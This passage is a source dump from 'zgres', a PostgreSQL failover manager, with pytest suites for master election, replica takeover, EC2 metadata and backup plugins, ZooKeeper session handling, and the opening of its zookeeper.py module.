# no, so check if there is a master
call.dcs_lock('master'),
call.dcs_get_lock_owner('master'),
call.pg_stop(),
# compare our timeline to what's in the DCS
call.pg_get_timeline(),
call.dcs_get_timeline(),
# we're on an older timeline, so reset
call.pg_reset(),
]
# Carry on running afterwards
assert timeout == 5
def test_replica_start(app):
plugins = setup_plugins(app,
dcs_get_database_identifier='1234',
dcs_lock=True,
pg_replication_role='replica',
pg_get_database_identifier='1234')
app._conn_info['a'] = 'b'
def start_monitoring():
app.unhealthy('test_monitor', 'Waiting for first check')
plugins.start_monitoring.side_effect = start_monitoring
# sync startup
timeout = app.initialize()
assert plugins.mock_calls == [
call.initialize(),
call.get_my_id(),
# compare our id with the id in the DCS
call.dcs_get_database_identifier(),
call.pg_get_database_identifier(),
# check if I am a replica
call.pg_replication_role(),
# not master, so sure the DB is running
call.pg_start(),
# start monitoring
call.start_monitoring(),
call.dcs_watch(
app.master_lock_changed,
app._notify_state,
app._notify_conn_info,
),
# setup our connection info
call.get_conn_info(),
# set our first state
call.dcs_set_state({
'a': 'b',
'host': '127.0.0.1',
'replication_role': 'replica',
'health_problems': {'test_monitor':
{'can_be_replica': False, 'reason': 'Waiting for first check'}},
})
]
# Carry on running afterwards
assert timeout == None
assert app.health_problems == {'test_monitor': {'can_be_replica': False, 'reason': 'Waiting for first check'}}
# Our test monitor becomes healthy
plugins.reset_mock()
with patch('time.time') as mock_time:
app.healthy('test_monitor')
assert plugins.mock_calls == [
call.veto_takeover({'health_problems': {},
'a': 'b',
'replication_role': 'replica',
'host': '127.0.0.1'}),
call.dcs_set_state({'health_problems': {},
'a': 'b',
'replication_role': 'replica',
'host': '127.0.0.1',
'willing': mock_time(),
}),
call.pg_replication_role(),
call.dcs_set_conn_info({'a': 'b', 'host': '127.0.0.1'}),
]
def test_plugin_subscribe_to_state(app):
plugins = setup_plugins(app)
app.initialize()
assert plugins.dcs_watch.mock_calls == [
call.dcs_watch(
app.master_lock_changed,
app._notify_state,
app._notify_conn_info,
)]
def test_plugin_tells_app_to_follow_new_leader(app):
plugins = setup_plugins(app)
app.initialize()
plugins.reset_mock()
app.follow(primary_conninfo=dict(host='127.0.0.9', port=5432))
assert plugins.mock_calls == [
call.pg_replication_role(),
call.pg_setup_replication({'port': 5432, 'host': '127.0.0.9'}),
call.pg_restart()] # must restart for new recovery.conf to take effect
def test_restart_master(app, event_loop):
plugins = setup_plugins(app,
pg_replication_role='master')
app.initialize()
plugins.reset_mock()
with patch('time.sleep') as sleep:
app.restart(10)
assert sleep.called_once_with(10)
event_loop.run_forever() # must be stopped by restart()
assert plugins.mock_calls == [
call.pg_replication_role(),
call.pg_stop(),
call.dcs_disconnect()
]
def test_restart_replica(app, event_loop):
plugins = setup_plugins(app,
pg_replication_role='replica')
app.initialize()
plugins.reset_mock()
with patch('time.sleep') as sleep:
app.restart(10)
assert sleep.called_once_with(10)
event_loop.run_forever() # must be stopped by restart()
assert plugins.mock_calls == [
call.pg_replication_role(),
call.dcs_disconnect()
]
@pytest.mark.asyncio
async def test_master_lock_broken(app):
plugins = setup_plugins(app,
pg_replication_role='master')
assert app.initialize() == None
plugins.reset_mock()
# if the lock is broken, shutdown postgresql and exist
with patch('time.sleep') as sleep:
with patch('sys.exit') as exit:
app.master_lock_changed(None)
assert exit.called_once_with(0)
assert sleep.called_once_with(10)
assert plugins.mock_calls == [
call.pg_replication_role(),
call.pg_replication_role(),
call.pg_stop(),
call.dcs_disconnect(),
call.master_lock_changed(None)
]
assert app._master_lock_owner == None
@pytest.mark.asyncio
async def test_master_lock_changes_owner(app):
# if the lock changes owner to someone else, shutdown postgresql and exist
plugins = setup_plugins(app,
pg_replication_role='master')
assert app.initialize() == None
plugins.reset_mock()
with patch('time.sleep') as sleep:
with patch('sys.exit') as exit:
app.master_lock_changed('someone else')
assert exit.called_once_with(0)
assert sleep.called_once_with(10)
assert plugins.mock_calls == [
call.pg_replication_role(),
call.pg_replication_role(),
call.pg_stop(),
call.dcs_disconnect(),
call.master_lock_changed('someone else')
]
assert app._master_lock_owner == 'someone else'
# if the lock is owned by us, carry on trucking
plugins.reset_mock()
with patch('time.sleep') as sleep:
with patch('sys.exit') as exit:
app.master_lock_changed(app.my_id)
assert exit.called_once_with(0)
assert sleep.called_once_with(10)
assert plugins.mock_calls == [
call.pg_replication_role(),
call.master_lock_changed('42')
]
assert app._master_lock_owner == app.my_id
@pytest.mark.asyncio
async def test_plugin_subscribes_to_master_lock_change(app):
plugins = setup_plugins(app,
pg_get_timeline=42,
master_lock_changed=[('pluginA', None)],
pg_replication_role='replica')
assert app.initialize() == None
plugins.reset_mock()
app.master_lock_changed('someone else')
assert plugins.mock_calls == [
call.pg_replication_role(),
call.master_lock_changed('someone else'),
]
@pytest.mark.asyncio
async def test_replica_reaction_to_master_lock_change(app):
plugins = setup_plugins(app,
pg_get_timeline=42,
pg_replication_role='replica')
assert app.initialize() == None
plugins.reset_mock()
# if the lock changes owner to someone else, carry on trucking
plugins.reset_mock()
app.master_lock_changed('someone else')
assert plugins.mock_calls == [
call.pg_replication_role(),
call.master_lock_changed('someone else')
]
assert app._master_lock_owner == 'someone else'
# if the lock is owned by us, er, we stop replication and become the master
plugins.reset_mock()
plugins.pg_replication_role.side_effect = ['replica', 'master']
app.master_lock_changed(app.my_id)
assert plugins.mock_calls == [
call.pg_replication_role(),
call.dcs_set_state({
'replication_role': 'taking-over',
'willing': None,
'health_problems': {},
'host': '127.0.0.1'}),
call.pg_stop_replication(),
call.pg_replication_role(),
call.pg_get_timeline(),
call.dcs_set_timeline(42),
call.dcs_set_state({
'health_problems': {},
'replication_role': 'master',
'willing': None,
'host': '127.0.0.1'}),
call.master_lock_changed('42')
]
assert app._master_lock_owner == app.my_id
@pytest.mark.asyncio
async def test_replica_tries_to_take_over(app):
plugins = setup_plugins(app,
pg_replication_role='replica')
assert app.initialize() == None
plugins.reset_mock()
# if there is no lock owner, we start looping trying to become master
app.master_lock_changed(None)
assert plugins.mock_calls == [call.pg_replication_role(), call.master_lock_changed(None)]
plugins.reset_mock()
from asyncio import sleep as real_sleep
with patch('asyncio.sleep') as sleep:
sleeper = FakeSleeper()
sleep.side_effect = sleeper
# the first thing is to sleep a bit
await sleeper.next()
assert sleeper.log == [3]
assert plugins.mock_calls == []
# takeover attempted
states = [(app.my_id, {'willing': 99.0}), (app.my_id, {'willing': 100.0})]
plugins.dcs_list_state.return_value = states
await sleeper.next()
assert sleeper.log == [3, 3]
assert plugins.mock_calls == [
call.dcs_list_state(),
call.best_replicas([('42', {'willing': 99.0}), ('42', {'willing': 100.0})]),
call.dcs_lock('master')]
def test_replica_unhealthy(app):
plugins = setup_plugins(app,
pg_replication_role='replica')
app.initialize()
plugins.reset_mock()
app.unhealthy('boom', 'It went Boom')
assert plugins.mock_calls == [
call.dcs_set_state({
'host': '127.0.0.1',
'replication_role': 'replica',
'willing': None, # I am not going to participate in master elections
'health_problems': {'boom': {'reason': 'It went Boom', 'can_be_replica': False}}}),
call.pg_replication_role(),
call.dcs_delete_conn_info(),
]
def test_replica_slightly_sick(app):
plugins = setup_plugins(app,
pg_replication_role='replica')
app.initialize()
plugins.reset_mock()
app.unhealthy('boom', 'It went Boom', can_be_replica=True)
assert plugins.mock_calls == [
call.dcs_set_state({
'host': '127.0.0.1',
'replication_role': 'replica',
'willing': None, # I am not going to participate in master elections
'health_problems': {'boom': {'reason': 'It went Boom', 'can_be_replica': True}}}),
call.pg_replication_role(),
]
@pytest.mark.asyncio
async def test_master_unhealthy(app):
plugins = setup_plugins(app,
pg_replication_role='master')
app.initialize()
plugins.reset_mock()
app.unhealthy('boom', 'It went Boom', can_be_replica=True)
assert plugins.mock_calls == [
call.dcs_set_state({
'host': '127.0.0.1',
'replication_role': 'master',
'health_problems': {'boom': {'reason': 'It went Boom', 'can_be_replica': True}}}),
call.pg_replication_role(),
call.dcs_delete_conn_info(),
]
plugins.reset_mock()
# now we should have _handle_unhealthy_master running
with patch('asyncio.sleep') as sleep, patch('zgres.deadman.App._stop') as exit, patch('time.sleep') as blocking_sleep:
sleeper = FakeSleeper()
sleep.side_effect = sleeper
exit.side_effect = lambda : sleeper.finish()
# there is no replica, so we just sleep and ping the
# DCS to find a willing replica
states = [iter([])]
plugins.dcs_list_state.side_effect = states
await sleeper.next()
assert plugins.mock_calls == [call.dcs_list_state()]
# we add a willing replica
states = [iter([('other', {'willing': 1})])]
plugins.dcs_list_state.side_effect = states
plugins.reset_mock()
await sleeper.next()
assert plugins.mock_calls == [
call.dcs_list_state(),
call.pg_replication_role(),
call.pg_stop(),
call.dcs_disconnect()
]
```
#### File: zgres/tests/test_ec2.py
```python
import pytest
from unittest import mock
from moto import mock_ec2, mock_iam
def mock_get_instance_metadata(**kw):
metadata = {
'ami-id': 'ami-87d579ec',
'instance-id': 'i-00000001',
'instance-type': 't2.micro',
'local-ipv4': '10.1.0.107',
'placement': {'availability-zone': 'us-east-1d'},
'public-ipv4': '172.16.58.3',
'iam': {'info': {
u'InstanceProfileArn': u'arn:aws:iam::139485757383:instance-profile/Role',
u'InstanceProfileId': u'AIPAIKDEOQWOE343AKRIE',
u'Code': u'Success',
u'LastUpdated': u'2015-10-21T20:39:13Z'},
'security-credentials': {'Role': {
u'Code': u'Success',
u'LastUpdated': u'2015-10-21T20:39:29Z',
u'AccessKeyId': u'<KEY>',
u'SecretAccessKey': u'<KEY>',
u'Token': u'<KEY>
u'Expiration': u'2015-10-22T02:48:46Z',
u'Type': u'AWS-HMAC'}}}
}
metadata.update(kw)
def f(data='meta-data/', **kw):
path = [i for i in data.split('/') if i]
curr = metadata
assert path[0] == 'meta-data'
for i in path[1:]:
curr = curr[i]
return curr
return f
@pytest.fixture
def ec2_plugin():
app = mock.Mock()
app.database_identifier = '4242'
app.config = dict()
from ..ec2 import Ec2Plugin
return Ec2Plugin('zgres#ec2', app)
@mock.patch('boto.utils.get_instance_metadata')
def test_conn_info(get_instance_metadata, ec2_plugin):
get_instance_metadata.side_effect = mock_get_instance_metadata()
ec2_plugin.initialize()
assert ec2_plugin.get_my_id() == 'i-00000001'
assert ec2_plugin.get_conn_info() == {
'ami-id': 'ami-87d579ec',
'availability-zone': 'us-east-1d',
'host': '10.1.0.107',
'instance-type': 't2.micro'}
@pytest.fixture
def ec2_backup_plugin():
app = mock.Mock()
app.database_identifier = '4242'
app.pg_connect_info.return_value = dict(user='postgres', host='example.org')
from ..ec2 import Ec2SnapshotBackupPlugin
return Ec2SnapshotBackupPlugin('zgres#ec2-backup', app)
@pytest.mark.xfail
@mock_ec2
@mock.patch('zgres.ec2.psycopg2')
@mock.patch('boto.utils.get_instance_metadata', autospec=True)
@mock.patch('zgres.ec2.LocalDevice', autospec=True)
@mock.patch('zgres.ec2._all_devices_mounted', autospec=True)
def test_ec2_backup_plugin(_all_devices_mounted, local_device, get_instance_metadata, psycopg2, ec2_backup_plugin):
# setup
import boto.ec2
psycopg2.connect().cursor().fetchall.return_value = [['0/2000060']]
get_instance_metadata.side_effect = mock_get_instance_metadata()
metadata = get_instance_metadata()
az = metadata['placement']['availability-zone']
region = az[:-1]
conn = boto.ec2.connect_to_region(region)
reservation = conn.run_instances('ami-12341234')
instance = reservation.instances[0]
vol_f = conn.create_volume(10, az)
vol_f.attach(instance.id, '/dev/sdf')
vol_g = conn.create_volume(10, az)
vol_g.attach(instance.id, '/dev/sdg')
metadata['instance-id'] = instance.id # act as if we are code running on the server we just launched
# test
ec2_backup_plugin.app.config = {
'ec2-snapshot': {
'dev.1.device': '/dev/sdf',
'dev.1.iops': '1000',
'dev.1.size': '300',
'dev.1.volume_type': 'gp2',
'dev.2.device': '/dev/sdg',
}}
ec2_backup_plugin.initialize()
# make some snapshots
ec2_backup_plugin.pg_backup()
# restore from the snapshots I just made
ec2_backup_plugin.pg_restore()
```
#### File: zgres/tests/test_replication.py
```python
from unittest import mock
import pytest
@pytest.fixture
def follow_the_leader(request):
from ..deadman import App
app = mock.Mock(spec_set=App)
app.my_id = '42'
from ..replication import FollowTheLeader
plugin = FollowTheLeader('zgres#follow-the-leader', app)
return plugin
def test_no_conn_info(follow_the_leader):
# can't follow anything without connection info
follow_the_leader.master_lock_changed(None)
assert follow_the_leader._am_following == None
follow_the_leader.master_lock_changed('not me')
assert follow_the_leader._am_following == None
follow_the_leader.master_lock_changed(follow_the_leader.app.my_id)
assert follow_the_leader._am_following == None
```
#### File: zgres/tests/test_utils.py
```python
def test_pg_lsn_to_int():
from ..utils import pg_lsn_to_int
assert pg_lsn_to_int('67E/AFE198') - pg_lsn_to_int('67D/FECFA308') == 14696080
assert pg_lsn_to_int('0/000000') == 0
assert pg_lsn_to_int('0/00000F') == 15
assert pg_lsn_to_int('1/00000F') == 0xFF00000F
```
#### File: zgres/tests/test_zookeeper.py
```python
from configparser import ConfigParser
from unittest import mock
import time
import json
import asyncio
import pytest
from zake.fake_client import FakeClient
from kazoo.client import KazooState
import kazoo.exceptions
from zgres import sync
from . import FakeSleeper
class MyFakeClient(FakeClient):
@property
def client_id(self):
return (self.session_id, 'abc')
@pytest.mark.asyncio
async def test_functional(deadman_plugin):
"""Test as much of the whole stack of zgres-sync as we can."""
config = {
'sync': {
'plugins': 'zgres#zookeeper zgres#mock-subscriber'},
'zookeeper': {
'connection_string': 'example.org:2181',
'path': '/mypath',
}
}
deadmanA = deadman_plugin('A')
deadmanB = deadman_plugin('B')
deadmanA.dcs_set_database_identifier('1234')
deadmanA.dcs_set_conn_info(dict(answer=42))
deadmanA.dcs_lock('master')
deadmanB.dcs_set_state(dict(mystate='lamentable'))
ev = asyncio.Event()
async def next_ev():
await ev.wait()
ev.clear()
def set_ev(*args, **kw):
ev.set()
for i in range(10):
asyncio.get_event_loop().call_later(4 + 0.1 * i, set_ev)
from . import MockSyncPlugin as RealMockSyncPlugin
with mock.patch('zgres.tests.MockSyncPlugin') as MockSyncPlugin:
# sigh, FAR to complex
proxy, p = RealMockSyncPlugin('', '')
p.databases.side_effect = set_ev
p.state.side_effect = set_ev
p.masters.side_effect = set_ev
p.conn_info.side_effect = set_ev
MockSyncPlugin.return_value = proxy
with mock.patch('zgres.zookeeper.KazooClient') as KazooClient:
KazooClient.return_value = MyFakeClient(storage=deadmanA._storage._zk._storage)
app = sync.SyncApp(config)
for i in range(3):
await next_ev()
deadmanA.dcs_set_state(dict(mystate='great!'))
deadmanB.dcs_set_conn_info(dict(answer=43))
deadmanA.dcs_unlock('master')
for i in range(3):
await next_ev()
# the plugin was called twice, once with the original data, and once with new data
assert p.conn_info.mock_calls == [
mock.call({'mygroup': {'A': {'answer': 42}}}),
mock.call({'mygroup': {'A': {'answer': 42}, 'B': {'answer': 43}}})]
p.state.assert_has_calls(
[mock.call({'mygroup': {'B': {'mystate': 'lamentable'}}}),
mock.call({'mygroup': {'B': {'mystate': 'lamentable'}, 'A': {'mystate': 'great!'}}})]
)
p.masters.assert_has_calls(
[mock.call({'mygroup': 'A'}),
mock.call({})]
)
p.databases.assert_has_calls([mock.call(['mygroup'])])
@pytest.fixture
def storage(request):
from ..zookeeper import ZookeeperStorage
s = ZookeeperStorage('connection_string', '/path')
zk = MyFakeClient()
with mock.patch('zgres.zookeeper.KazooClient') as KazooClient:
KazooClient.return_value = zk
s.dcs_connect()
return s
@pytest.fixture
def deadman_plugin(request):
from ..deadman import App
storage = None
def factory(my_id='42'):
nonlocal storage
app = mock.Mock(spec_set=App)
app.my_id = my_id
app.restart._is_coroutine = False
app.config = dict(
zookeeper=dict(
connection_string='localhost:1234',
path='/mypath',
group='mygroup',
))
app.master_lock_changed._is_coroutine = False # otherwise tests fail :(
from ..zookeeper import ZooKeeperDeadmanPlugin
plugin = ZooKeeperDeadmanPlugin('zgres#zookeeper', app)
zk = MyFakeClient(storage=storage)
if storage is None:
# all plugins created by this factory SHARE a storage
storage = zk.storage
with mock.patch('zgres.zookeeper.KazooClient') as KazooClient:
KazooClient.return_value = zk
plugin.initialize()
return plugin
return factory
@pytest.mark.asyncio
async def test_disconnect_should_not_restart(deadman_plugin):
plugin = deadman_plugin()
await asyncio.sleep(0.001)
plugin.dcs_disconnect()
await asyncio.sleep(0.001)
assert plugin.app.mock_calls == [] # restart was not called
@pytest.mark.asyncio
async def test_session_suspended(deadman_plugin):
plugin = deadman_plugin()
await asyncio.sleep(0.001)
# suspend the connection
plugin.logger.warn = mock.Mock()
plugin._storage._zk._fire_state_change(KazooState.SUSPENDED)
await asyncio.sleep(0.001)
plugin.logger.warn.assert_called_once_with('zookeeper connection state: SUSPENDED')
assert plugin._dcs_state == 'SUSPENDED'
assert plugin.app.mock_calls == []
@pytest.mark.asyncio
async def test_session_suspended_but_reconnect_in_5_seconds(deadman_plugin):
with mock.patch('zgres.zookeeper.sleep') as sleep:
# yeah, tests with firewalls show that this really does happen
plugin = deadman_plugin()
await asyncio.sleep(0.001)
sleeper = FakeSleeper(max_loops=1000)
sleep.side_effect = sleeper
# suspend the connection
plugin.logger.warn = mock.Mock()
plugin._storage._zk._fire_state_change(KazooState.SUSPENDED)
await sleeper.next()
await sleeper.next()
await sleeper.next()
await sleeper.next()
ntasks = len(asyncio.Task.all_tasks())
plugin._storage._zk._fire_state_change(KazooState.CONNECTED)
time.sleep(0.001)
await asyncio.sleep(0.001)
assert ntasks - len(asyncio.Task.all_tasks()) == 1 # the _check_state task finished
assert plugin.app.mock_calls == []
assert plugin.logger.warn.mock_calls == [
mock.call('zookeeper connection state: SUSPENDED'),
mock.call('zookeeper connection state: CONNECTED'),
]
assert plugin._dcs_state == KazooState.CONNECTED
@pytest.mark.asyncio
async def test_session_suspended_but_never_reconnects_or_is_lost(deadman_plugin):
with mock.patch('zgres.zookeeper.sleep') as sleep:
# yeah, tests with firewalls show that this really does happen
plugin = deadman_plugin()
await asyncio.sleep(0.001)
sleeper = FakeSleeper(max_loops=25)
sleep.side_effect = sleeper
def finish(timeout):
sleeper.finish()
plugin.app.restart.side_effect = finish
# suspend the connection
plugin.logger.warn = mock.Mock()
plugin._storage._zk._fire_state_change(KazooState.SUSPENDED)
await sleeper.wait()
assert plugin.app.mock_calls == [
mock.call.restart(0)
]
assert plugin.logger.warn.mock_calls == [
mock.call('zookeeper connection state: SUSPENDED'),
]
assert plugin._dcs_state == KazooState.SUSPENDED
@pytest.mark.asyncio
async def test_session_lost(deadman_plugin):
plugin = deadman_plugin()
await asyncio.sleep(0.001)
plugin.app.reset_mock()
plugin._storage._zk._fire_state_change(KazooState.LOST)
await asyncio.sleep(0.001)
assert plugin._dcs_state == 'LOST'
assert plugin.app.mock_calls == [
mock.call.restart(0)
]
@pytest.mark.asyncio
async def test_notifications_of_state_chagnge_where_id_has_a_dash(deadman_plugin):
pluginA = deadman_plugin('i-9b61354f')
finished = asyncio.Event()
asyncio.get_event_loop().call_later(5, finished.set)
callback = mock.Mock()
callback.side_effect = lambda *args, **kw: finished.set()
pluginA.dcs_watch(None, callback, None)
pluginA.dcs_set_state(dict(name='A'))
await finished.wait()
assert callback.mock_calls == [
mock.call({'i-9b61354f': {'name': 'A'}}),
]
@pytest.mark.asyncio
async def test_groups_are_independant(deadman_plugin):
plugin = deadman_plugin
pluginA, pluginB, pluginC = plugin('A'), plugin('B'), plugin('C')
pluginC._group_name = 'another'
# pluginB watches state, plugin A doesn't
pluginA.dcs_watch(None, None, None)
callbackB = mock.Mock()
pluginB.dcs_watch(None, callbackB, None)
callbackC = mock.Mock()
pluginC.dcs_watch(None, callbackC, None)
# set state from both plugins
pluginA.dcs_set_state(dict(name='A'))
pluginB.dcs_set_state(dict(name='B'))
pluginC.dcs_set_state(dict(name='C'))
await asyncio.sleep(0.005)
# pluginB gets events, but ONLY from plugins in its group
# i.e. c is ignored
# NOTE: we test only the LAST call as state for A and B may come out-of-order
# but the final, rest state, should be correct
assert callbackB.mock_calls[-1] == mock.call({'A': {'name': 'A'}, 'B': {'name': 'B'}})
# C got it's own event
assert callbackC.mock_calls == [
mock.call({'C': {'name': 'C'}}),
]
# We can get all info
assert sorted(pluginA.dcs_list_state()) == sorted(pluginB.dcs_list_state())
assert sorted(pluginA.dcs_list_state()) == [('A', {'name': 'A'}), ('B', {'name': 'B'})]
assert sorted(pluginC.dcs_list_state()) == [('C', {'name': 'C'})]
def test_errorlog_after_second_takeover(deadman_plugin):
plugin = deadman_plugin
# 2 servers with the same id should NOT happen in real life...
pluginA1 = plugin(my_id='A')
pluginA2 = plugin(my_id='A')
pluginA2.logger = mock.Mock()
# now they start to fight
pluginA1.dcs_set_state(dict(server=41))
pluginA2.dcs_set_state(dict(server=42))
pluginA1.dcs_set_state(dict(server=43))
# this is the second time plugin2 is taking over
# We should log an error message now
assert not pluginA2.logger.error.called
pluginA2.dcs_set_state(dict(server=44))
assert pluginA2.logger.error.called
# though the state is still set
assert sorted(pluginA1.dcs_list_state()) == [('A', dict(server=44))]
def test_storage_get_database_identifiers(storage):
assert storage.dcs_get_database_identifiers() == {}
storage.dcs_set_database_identifier('db1', '124')
assert storage.dcs_get_database_identifiers() == {'db1': 124}
def mock_verify(plugin, side_effect):
# cause the verify() function to fail in zake, thus all api calls error
verify = mock.Mock()
verify.side_effect = side_effect
plugin._storage.connection.verify = verify
plugin._kazoo_retry.sleep_func = lambda x: None # speed up tests by not sleeping
return verify
@pytest.mark.asyncio
async def test_retry_on_connection_loss(deadman_plugin):
# connection loss is a temporary exception which seems to happen after a re-connection
# (but not session expiration)in zookeeper. We just retry that till it works.
plugin = deadman_plugin('A')
verify = mock_verify(plugin, [
kazoo.exceptions.ConnectionLoss(),
kazoo.exceptions.ConnectionLoss(),
kazoo.exceptions.ConnectionLoss(),
kazoo.exceptions.ConnectionLoss(),
kazoo.exceptions.ConnectionLoss(),
None,
None])
# set state from both plugins
plugin.dcs_set_state(dict(name='A'))
await asyncio.sleep(0.001)
assert plugin.app.mock_calls == []
assert verify.call_count > 4
@pytest.mark.asyncio
async def test_retry_NO_retry_on_session_expired(deadman_plugin):
# connection loss is a temporary exception which seems to happen after a re-connection
# (but not session expiration)in zookeeper. We just retry that till it works.
plugin = deadman_plugin('A')
verify = mock_verify(plugin, [kazoo.exceptions.SessionExpiredError()])
# set state from both plugins
with pytest.raises(kazoo.exceptions.SessionExpiredError):
plugin.dcs_set_state(dict(name='A'))
await asyncio.sleep(0.001)
assert plugin.app.mock_calls == [
mock.call.restart(0)
]
@pytest.mark.asyncio
async def test_retry_with_random_exception(deadman_plugin):
# connection loss is a temporary exception which seems to happen after a re-connection
# (but not session expiration)in zookeeper. We just retry that till it works.
plugin = deadman_plugin('A')
class MyException(Exception):
pass
verify = mock_verify(plugin, [MyException()])
# set state from both plugins
with pytest.raises(MyException):
plugin.dcs_set_state(dict(name='A'))
await asyncio.sleep(0.001)
assert plugin.app.mock_calls == []
import time as ttt
@pytest.mark.asyncio
async def test_retry_deadline(deadman_plugin):
with mock.patch('time.time') as time:
plugin = deadman_plugin('A')
time.return_value = 120
print(ttt.time(), time())
def my_side_effect():
time.return_value = 240
raise kazoo.exceptions.ConnectionLoss()
verify = mock_verify(plugin, my_side_effect)
# set state from both plugins
with pytest.raises(kazoo.retry.RetryFailedError) as e:
plugin.dcs_set_state(dict(name='A'))
assert e.value.args[0] == "Exceeded retry deadline"
await asyncio.sleep(0.001)
assert plugin.app.mock_calls == []
@pytest.mark.asyncio
async def test_retry_list_all_states(deadman_plugin):
# connection loss is a temporary exception which seems to happen after a re-connection
# (but not session expiration)in zookeeper. We just retry that till it works.
plugin = deadman_plugin('A')
plugin.dcs_set_state(dict(name='A'))
verify = mock_verify(plugin, [
kazoo.exceptions.ConnectionLoss(),
kazoo.exceptions.ConnectionLoss(),
kazoo.exceptions.ConnectionLoss(),
None,
None,
None,
None])
# set state from both plugins
assert list(plugin.dcs_list_state()) == [('A', {'name': 'A'})]
await asyncio.sleep(0.001)
assert plugin.app.mock_calls == []
```
#### File: zgres/zgres/zookeeper.py
```python
import json
import asyncio
from asyncio import sleep
import queue
import logging
from functools import partial
from collections.abc import Mapping
import kazoo.exceptions
from kazoo.client import KazooClient, KazooState, KazooRetry
from .plugin import subscribe
_missing = object()
def state_to_databases(state, get_state):
"""Convert the state to a dict of connectable database clusters.
The dict is:
{"databases": {
"databaseA": {
"master": "10.0.0.19",
"nodes": {
"10.0.0.9":
{
...extra node data...
},
"10.0.0.10":
{
...extra node data...
},
"10.0.0.99":
{
...extra node data...
}}},
"databaseB": {
"master": "10.0.0.19",
"nodes": {
"10.0.0.19":
{
...extra node data...
},
"10.0.0.20":
{
...extra node data...
}}},
}}
if get_state=True, then node data will be the contents of the state-
znodes. If get_state=False, the node data will be the contents of the
conn- znodes.
"""
databases = {}
for node, v in state.items():
parts = node.split('_', 1)
if len(parts) == 1:
continue
cluster_name, node = parts
if node.startswith('state_') and get_state:
_, ip4 = node.split('_', 1)
database = databases.setdefault(cluster_name, dict(nodes={}))
assert ip4 not in database['nodes']
database['nodes'][ip4] = v
if node.startswith('conn_') and not get_state:
_, ip4 = node.split('_', 1)
database = databases.setdefault(cluster_name, dict(nodes={}))
assert ip4 not in database['nodes']
database['nodes'][ip4] = v
if node == 'master':
cluster = databases.setdefault(cluster_name, dict(nodes={}))
cluster['master'] = v
return databases
class DictWatch(Mapping):
"""A mapping which reflects the content of a path in ZooKeeper.
For every znode in the path, there will exist a key (znode name) and value
(deserialized node content) in the mapping. To be notified if the mapping
changes, you can pass a callback function, this will be called on change.
The callback is called with 4 arguments: (mapping, key, from_value, to_value)
* mapping is the DictWatch object
* key is the dictionary key
* to_value is the value which is being set
* from_value is the value which was there previously
The callack WILL be called in the main thread and the order of events from
zookeeper will be maintained.
On add from_value is DictWatch.MISSING, on delete, to value will be
DictWatch.MISSING.
The implementation of this is that kazoo-fired events will be put on a
threadsafe queue and will be processed later (in order) in the asyncio main
thread.
"""
MISSING = object()
def __init__(self, zk, path, callback, prefix=None, deserializer=None):
self._zk = zk
self._callback = callback
self._state = {}
if not path.endswith('/'):
path += '/'
self._path = path
self._child_watchers = {}
self._loop = asyncio.get_event_loop()
self._zk_event_queue = queue.Queue()
self._prefix = prefix
self._watch()
if deserializer is not None:
self._deserialize = deserializer
def _watch(self):
"""Start watching."""
watch = partial(self._queue_event, '_children_changed')
self._child_watcher = self._zk.ChildrenWatch(self._path, watch)
def __getitem__(self, key):
return self._state[key]
def __iter__(self):
return iter(self._state)
def __len__(self):
return len(self._state)
def _deserialize(self, data):
data = data.decode('ascii')
return json.loads(data)
def _queue_event(self, event_name, *args, **kw):
# Note: this runs in the kazoo thread, hence we use
# a threadsafe queue
self._zk_event_queue.put((event_name, args, kw))
self._loop.call_soon_threadsafe(self._consume_queue)
def _consume_queue(self):
while True:
try:
event_name, args, kw = self._zk_event_queue.get(block=False)
except queue.Empty:
return
getattr(self, event_name)(*args, **kw)
def _watch_node(self, node):
child_path = self._path + node
watch = partial(self._queue_event, '_node_changed', node)
return self._zk.DataWatch(child_path, watch)
def _node_changed(self, node, data, stat, event):
"""Watch a single node in zookeeper for data changes."""
old_val = self._state.pop(node, self.MISSING)
if data is None:
new_val = self.MISSING
self._child_watchers.pop(node, None) # allow our watcher to get garbage collected
else:
new_val = self._deserialize(data)
self._state[node] = new_val
if old_val is self.MISSING and new_val is self.MISSING:
# we re-deleted an already deleted node
return
if old_val == new_val:
# no change
return
self._callback(self, node, old_val, new_val)
def _children_changed(self, children):
to_add = set(children) - set(self._child_watchers)
for node in to_add:
if self._prefix is not None:
if not node.startswith(self._prefix):
continue
self._child_watchers[node] = self._watch_node(node)
class ZooKeeperSource:
_old_connection_info = None
def __init__(self, name, app):
self.app = app
self._path_prefix = self.app.config['zookeeper']['path'].strip()
if not self._path_prefix.endswith('/'):
self._path_prefix += '/'
@subscribe
def start_watching(self, state, conn_info, masters, databases):
self._storage = ZookeeperStorage(
self.app.config['zookeeper']['connection_string'],
self.app.config['zookeeper']['path'].strip(),
timeout=float(self.app.config['zookeeper'].get('timeout', '10').strip()),
)
self._storage.dcs_connect()
if state is not None:
self._storage.dcs_watch_state(state)
if conn_info is not None:
print('CONNECT_CONN_INFO', conn_info)
self._storage.dcs_watch_conn_info(conn_info)
else:
print('SKIP CONNECT_CONN_INFO', conn_info)
if masters is not None:
self._storage.dcs_watch_locks('master', masters)
if databases is not None:
self._storage.dcs_watch_database_identifiers(partial(self._notify_databases, databases))
def _notify_databases(self, callback, state):
callback(list(state.keys()))
def _get_clusters(in_dict):
out_dict = {}
for k, v in in_dict.items():
group_name, cluster_id = k.split('-', 1)
out_dict.setdefault(group_name, {})[cluster_id] = v
return out_dict
class ZooKeeperDeadmanPlugin:
_dcs_state = None
def __init__(self, name, app):
self.name = name
self.app = app
self.tick_time = app.tick_time # seconds: this should match the zookeeper server tick time (normally specified in milliseconds)
self.logger = logging
self._takeovers = {}
self._kazoo_retry = KazooRetry(
max_tries=10,
deadline=60,
ignore_expire=False,
)
def _retry(self, method, *args, **kw):
cmd = getattr(self._storage, method)
try:
return self._kazoo_retry(cmd, *args, **kw)
except kazoo.exceptions.SessionExpiredError:
# the session has expired, we are going to restart anyway when the LOST state is set
# however the exceptionhandler waits some time before restarting
#
# we want to restart immediately so call restart(0) first
loop = asyncio.get_event_loop()
loop.call_soon(self.app.restart, 0)
raise
@subscribe
def initialize(self):
self._loop = asyncio.get_event_loop()
self._storage = ZookeeperStorage(
self.app.config['zookeeper']['connection_string'],
self.app.config['zookeeper']['path'].strip(),
timeout=float(self.app.config['zookeeper'].get('timeout', '10').strip()),
)
# we start watching first to get all the state changes
self._storage.connection.add_listener(self._session_state_handler)
self._storage.dcs_connect()
self._group_name = self.app.config['zookeeper']['group'].strip()
if '/' in self._group_name or '-' in self._group_name:
raise ValueError('cannot have - or / in the group name')
def _session_state_handler(self, state):
